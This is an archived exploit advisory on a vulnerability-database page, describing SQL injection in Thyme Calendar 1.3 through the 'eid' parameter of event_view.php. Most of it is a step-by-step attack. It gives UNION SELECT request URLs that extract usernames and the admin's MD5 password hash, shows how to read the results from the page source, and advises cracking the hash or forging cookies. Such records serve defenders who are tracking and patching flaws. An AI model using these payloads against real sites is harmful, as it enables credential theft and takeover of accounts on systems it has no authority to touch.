Vulners
Lucene search
Thyme Calendar 1.3 Remote SQL Injection Vulnerability
##################################################
## Thyme Calendar 1.3 SQL Vulnerability Exploit ##
## by Warlord ##
##################################################
## codehook.110mb.com ##
##################################################
-------------------------------------------------------------------
OVERVIEW AND DEFINITION
-------------------------------------------------------------------
A vulnerability in exists in Thyme Calendar 1.3 (and possibly lower
versions) which
allows execution of a custom SQL query.
The vulnerability exists in event_view.php, because the 'eid' field is not
properly
validated. An attacker could exploit the vulnerabilit with the following
request:
http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT userid
FROM thyme_Users
Where 'sitename' is the name of the site, and 'thyme_directory' is the
directory in which
Thyme is located.
-------------------------------------------------------------------
SQL QUERY
-------------------------------------------------------------------
The SQL query originally looks like this:
SELECT id FROM thyme_Attachments WHERE eid = 34
But by changing the 'eid' field we get a query that looks like this:
SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM
thyme_Users
-------------------------------------------------------------------
RESULT OF NEW QUERY
-------------------------------------------------------------------
The result is that the query sends back all the userid's (actually
usernames) from the
database instead of the 'id' from thyme_Attachments. You will be able to
grab the userid's
from the HTML source by searching for 'aid=' as this is where the attachment
id is
supposed to go. For example:
http://sitename/thyme_directory/download_attachment.php?aid=admin
-------------------------------------------------------------------
GETTING PASSWORDS
-------------------------------------------------------------------
And the password (md5'd) can be obtained in the same fashion:
http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT pass FROM
thyme_Users
WHERE username = "admin"
In the HTML source:
http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a
-------------------------------------------------------------------
HOW TO EXPLOIT
-------------------------------------------------------------------
Cookies should be modifiable. If not, crack the md5!
http://md5.rednoize.com
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2007 00:00Current
7.1High risk
Vulners AI Score7.1